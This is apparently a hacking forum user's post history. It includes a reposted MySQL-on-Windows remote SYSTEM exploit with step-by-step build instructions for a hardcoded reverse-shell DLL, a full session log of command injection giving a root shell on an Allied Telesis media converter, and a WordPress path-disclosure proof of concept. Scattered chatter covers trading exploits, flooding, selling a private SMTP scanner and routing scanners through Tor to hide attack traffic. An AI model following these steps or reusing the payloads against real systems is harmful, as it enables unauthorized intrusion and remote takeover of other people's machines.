wind

Active Members
  • Posts

    241
  • Joined

  • Last visited

Everything posted by wind

  1. *** FARLiGHT ELiTE HACKERS LEGACY R3L3ASE ***

     Attached is the MySQL Windows Remote Exploit (post-auth, udf technique) including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org.

     Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
     All owned By Kingcope
     http://www.exploit-db.com/sploits/23073.tar.gz

     Installation Instructions
     =============================

     1. Install mysql client libraries and headers (UNIX)
        RedHat based (e.g. CentOS): yum install mysql mysql-devel

     2. Compile the standalone exploit
        issue commands:
        gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient

     3. Compile the reverse shell payload (this is required!)
        required because the connect back ip and port are hardcoded in the dll:
        use mingw on windows or wine
        change REVERSEIP and REVERSEPORT to suit your needs.
        If you change REVERSEPORT you have to change the port in mysqljackpot.c too (default port: 443).
        issue commands:
        set PATH=%PATH%;c:\MinGW\bin\
        gcc -c payload.c
        gcc -shared -o payload.dll payload.o -lws2_32
        copy the payload.dll into the mysqljackpot exploit folder

     4. Run The Exploit
        ./mysqljackpot -u root -p "" -t 99.99.99.99
        A valid database admin user and his password are required for the exploit to work properly.
        This exploit is especially useful when used in connection to a MySQL login scanner, see scanner/README.mysql inside this package.
        Be sure to have the firewall open on the desired reverse port on the attacking machine.

     5. Enjoy your SYSTEM Shell!!!

     Yours Sincerely,
     -- Kingcope
  2. [ Discovered by dun \ posdub[at]gmail.com ] [ 2013-01-02 ]

     ####################################################################
     # [ Allied Telesis AT-MCF2000M 3.0.2 ] Gaining Root Shell Access #
     ####################################################################
     #
     # Device: "The AT-MCF2000M is the management module for the AT-MCF2000 two-slot chassis.
     # With the AT-MCF2000M management module, if there is a blade failure,
     # insertion or removal, your traffic flow will not be interrupted.."
     #
     # Vendor: http://www.alliedtelesis.com/
     # Product: http://www.alliedtelesis.com/p-2265.html
     # Software Download: ftp://ftp.alliedtelesis.com/pub/medconv/mcf2000/AT-S85_S97_v302.ZIP
     #
     ###################################################################

     # Vulnerability:

     Logging in to the system via ssh/telnet is necessary to use this vulnerability. After logging in, the user has access to the client menu (/sbin/AtiCli), without access to the shell. User-supplied data are not validated properly. In the section "File Show Filesystem=system://0/m/", it is possible to inject a command using the special characters: "|;&. Commands are limited to max 25 characters. The character / is filtered.

     For example:

     # File Show Filesystem=system://0/m/";echo 11111111111111111111"

     File name can be only up to 25 alphanumeric characters.

     <>20:54:16::File Show Filesystem=system://0/m/";echo 11111111111111111111"::DENY(CLI_STRING_LENGTH_OUT_OF_RANGE)::[00.002]

     # File Show Filesystem=system://0/m/";ls -al /"
     <>20:55:00::File Show Filesystem=system://0/m/";ls -al /"::DENY(CLI_INVALID_PARAMETER)::[00.002]

     Getting root access:

     root@debian:~# ssh 10.11.200.2
     --------------------------------------------------------------------------------
     Allied Telesis Media Converter AT-MCF2000
     --------------------------------------------------------------------------------
     Login: manager
     Password: *******
     Allied Telesis Media Converter - Version 3.0.2
     <No System Name>
     # ?
     COnfiguration - Configuration related commands
     DIagnostics - Diagnostics related commands
     File - File related commands
     IP - IP related commands
     Logging - Logging related commands
     Ntp - Ntp related commands
     Ping - Ping a host
     System - System related commands
     Telnet - Telnet related commands
     SNMP - Snmp related commands
     SSh - SSH related commands
     User - User management commands
     CLear - Clear the terminal screen
     Help - CLI help information
     EXit - Exit
     # File Show Filesystem=system://0/m/
     Module 0/M File System:
     -rw-r--r-- 1 0 0 2640 Jan 1 15:27 BM_0_1.cfg
     -rw-r--r-- 1 0 0 2612 Jan 1 15:27 BM_0_2.cfg
     -rw-r--r-- 1 0 0 1355 Jan 1 15:27 MM.cfg
     -rw-r--r-- 1 0 0 310 Dec 31 13:17 file.inf
     -rw-r--r-- 1 0 0 6609 Jan 1 15:27 mcf_chassis0.cfg
     # File Show Filesystem=system://0/m/BM_0_1.cfg
     Module 0/M File System:
     -rw-r--r-- 1 0 0 2640 Jan 1 15:27 BM_0_1.cfg
     # File Show Filesystem=system://0/m/test
     Module 0/M File System:
     ls: test: No such file or directory
     <>18:55:19::File Show Filesystem=system://0/m/test::COMPL::[00.052]
     # File Show Filesystem=system://0/m/|id
     Module 0/M File System:
     uid=0 gid=0
     # File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"
     Module 0/M File System:
     <>19:00:41::File Show Filesystem=system://0/m/|"telnetd -l${SHELL} -p30"::COMPL::[00.061]
     # File Show Filesystem=system://0/m/|"ps aux|grep telnet"
     Module 0/M File System:
     25 0 336 S /usr/sbin/telnetd -l /sbin/AtiCli
     497 0 192 S telnetd -l/bin/sh -p30
     <>19:01:02::File Show Filesystem=system://0/m/|"ps aux|grep telnet"::COMPL::[00.117]
     # exit
     <>19:01:40::exit::COMPL::[00.001]
     # logging out.
     Connection to 10.11.200.2 closed.
     root@debian:~# nc 10.11.200.2 30

     BusyBox v1.01 (2005.09.07-23:28+0000) Built-in shell (ash)
     Enter 'help' for a list of built-in commands.

     / # id
     uid=0 gid=0
     / # uname -a
     Linux (none) 2.6.14 #2 Thu Jul 23 17:15:38 PDT 2009 ppc unknown
     / # cat /proc/version
     Linux version 2.6.14 (schen@arun-linux) (gcc version 3.4.4) #2 Thu Jul 23 17:15:38 PDT 2009
     / # ls -al
     drwxr-xr-x 15 1046 1002 1024 Jan 1 18:58 .
     drwxr-xr-x 15 1046 1002 1024 Jan 1 18:58 ..
     -rw-r--r-- 1 0 0 125 Jan 1 19:10 .ash_history
     -rw-r--r-- 1 0 0 0 Jan 1 13:24 1
     drwxr-xr-x 2 0 0 1024 Aug 10 2009 bin
     drwxr-xr-x 3 0 0 0 Jan 1 15:27 cfg
     drwxr-xr-x 4 0 0 2048 Aug 10 2009 dev
     drwxr-xr-x 10 0 0 1024 Jan 1 1970 etc
     drwxr-xr-x 4 0 0 1024 Aug 10 2009 lib
     drwxr-xr-x 2 0 0 12288 Aug 10 2009 lost+found
     drwxr-xr-x 3 0 0 1024 Aug 10 2009 mnt
     dr-xr-xr-x 49 0 0 0 Jan 1 1970 proc
     drwx------ 2 0 0 1024 Aug 10 2009 root
     drwxr-xr-x 2 0 0 1024 Aug 10 2009 sbin
     drwxrwxrwt 2 0 0 1024 Jan 1 19:06 tmp
     drwxr-xr-x 6 0 0 1024 Aug 10 2009 usr
     drwxr-xr-x 7 0 0 1024 Jan 1 1970 var
     / # echo pwnd! & exit
     pwnd!
     Connection closed by foreign host.
     root@debian:~#
  3. Iceman is rubbish, I'm telling you, I know him personally; he got lucky plus wasted a lot of time on the net, didn't sleep at night, was hammering the scanner... so... screw him.
  4. I see Iceman live quite often, now on TV too.
  5. How could you use it? And how do you get the notifications to appear in the top right? Mine show up on the left...
  6. A torrent site? Or what is it?
  7. Hi, does anyone know if there is an exploit for SA:MP servers?
  8. wind

    Roots

    Happy New Year!
  9. Hi, which antivirus do you recommend between ESET and Avira? I don't have such a good PC, it's on its last legs... so far I've used NOD32... but it eats a lot of resources...
  10. You don't even know how to copy, you're not enough of a 'bandit'... anyway, nobody praises you for plagiarism; try to make something small, but at least it's made by you.
  11. It depends on what bandwidth it has; there's no point flooding if the bandwidth is weak, the flooded IP won't go down.
  12. Hi, I need an invite, does anyone have one to give me?
  13. # Exploit Title: WordPress 3.5 Path Disclosure Vulnerability
      # Date: 01/19/2013
      # Google Dork: intext:"powered by WordPress"
      # Exploit Author: L@usch - http://la.usch.io - http://la.usch.io/files/exploits/wordpress-3.5.txt
      # Vendor Homepage: http://wordpress.org/
      # Software Link: http://wordpress.org/latest.zip
      # Version: 3.5 and probably prior
      # Tested on: Windows

      Description:
      Successful exploitation of this vulnerability may allow an attacker to obtain the real path of the WordPress installation.

      Proof of Concept:
      --------------------------------------
      POST /wordpress/wp-includes/js/tinymce/plugins/spellchecker/rpc.php HTTP/1.1
      Content-Length: 22
      Content-Type: application/x-www-form-urlencoded
      Host: localhost
      Connection: Keep-alive
      Accept-Encoding: gzip,deflate
      User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
      Accept: */*

      json_data[$hack]=1
      --------------------------------------

      Done!
      Proof: http://goo.gl/PPhWf
  14. They're no good, don't bother.
  15. I've got one for VNC; do you have anything private for roots? Like this new Plesk one
  16. I have an SMTP scanner, it's private, for sale! PM me ..
  17. #!/usr/bin/perl
      ########################################
      # Perl Random Hostname Generator
      #
      # Files Modified:
      #   /etc/hostname
      #   /proc/sys/kernel/hostname
      #
      # A SoldierX utility by EverestX
      ########################################
      # Note on this copy: the numeric literals (the 0 in "0..$len", in
      # "$length = 0" and in "$#ARGV != 0") were lost when the post was
      # extracted; they are restored here so the counts match the comments
      # (5 alphanumerics plus one leading letter).
      use strict;
      use warnings;

      # Generate a 5-character lowercase alphanumeric value
      sub rand_host {
          my @chars = ('a'..'z', '0'..'9');
          my $len   = 4;
          my $host  = '';
          for (0..$len) {
              $host .= $chars[int rand @chars];
          }
          return $host;
      }

      # Generate the 1st letter (one uppercase character)
      sub rand_letter {
          my @chars  = ('A'..'Z');
          my $length = 0;
          my $letter = '';
          for (0..$length) {
              $letter .= $chars[int rand @chars];
          }
          return $letter;
      }

      print "****Hostname Generator****\n";
      print " A SoldierX Utility\n\n";

      if ($#ARGV != 0) {
          # Combine the 1st letter & the other 5 characters.
          my $hostname = rand_letter() . rand_host();
          print " Random hostname set to: $hostname \n";

          # Change the host files (needs root)
          open(my $fh1, '>', '/etc/hostname')
              or die "Cannot write /etc/hostname: $!";
          print $fh1 "$hostname";
          close($fh1);

          open(my $fh2, '>', '/proc/sys/kernel/hostname')
              or die "Cannot write /proc/sys/kernel/hostname: $!";
          print $fh2 "$hostname";
          close($fh2);
      }
  18. 1 Windows Box (tested using XP sp3)
      Internet Connection
      Time to test and verify traffic
      Advanced Onion Router | Free Security & Utilities software downloads at SourceForge.net

      Actually toring your Windows traffic
      ---------------------------------------------
      I've come to find out that the Tor+Vidalia+Privoxy bundle for Windows doesn't really work for much other than Firefox. Given the fact you're browsing the site, chances are you need more than *just* HTTP over TOR. While I don't recommend Windows as a pentest platform, there are some fantastic tools such as Oxid's Cain & Abel that are Windows only. There are cases where apps are Windows only, and in these cases you need to TOR your traffic forcibly. I can not guarantee anything will work for you, but it did for me; here's how I did it.

      Making it happen (with the Cap'n)
      -----------------------------------------
      First download, extract, and install Advanced Tor from the link above at SourceForge. The default settings should work for initially connecting. The default screen is this: Once connected you'll see this. I can confirm that the configuration is a bit glitchy, TEST THE CONNECTION TO TOR BEFORE SETTINGS MODIFICATION. If you get any errors after making modifications, just extract the zip again and start over.

      Forcing Apps Over Tor
      ----------------------------
      By default, most apps will not use TOR for their traffic. You will have to "force" it. Unfortunately, some apps and executables have issues with this, so IT IS ABSOLUTELY NECESSARY THAT YOU VERIFY YOUR TRAFFIC IS LEAVING OVER THE TOR NETWORK! In this screenshot you can see that I have forced 7th Sphere (my trusty lightweight scanner) and BL4CK's VNC Viewer over TOR. (Both work, BTW.)

      Checking your shits
      ------------------------
      You need to verify each forced app individually. Also, understand that a lot of the time some traffic may be leaked regardless, so be just as careful. I recommend using your own gateway or perimeter firewall to verify. This is how I verify my traffic is coming over Tor. Additionally, having remote systems to test and verify is even better. whatismyip.org is a straight text web page that you can test telnet connections to as well as web traffic. As I have mentioned, a lot of apps DO work, some don't, CMD for example. **ZENMAP DID NOT WORK IN MY TESTING, you've been warned; this may be due to my local network, but test it**
      --------------
      Cisco and Supgergates pentest app needs to be tested with this method if someone gets a chance before me.

      Reference: The interwebs.
      Source
  19. wind

    Selling shit

    cat /proc/cpuinfo ; free -m ; /sbin/ifconfig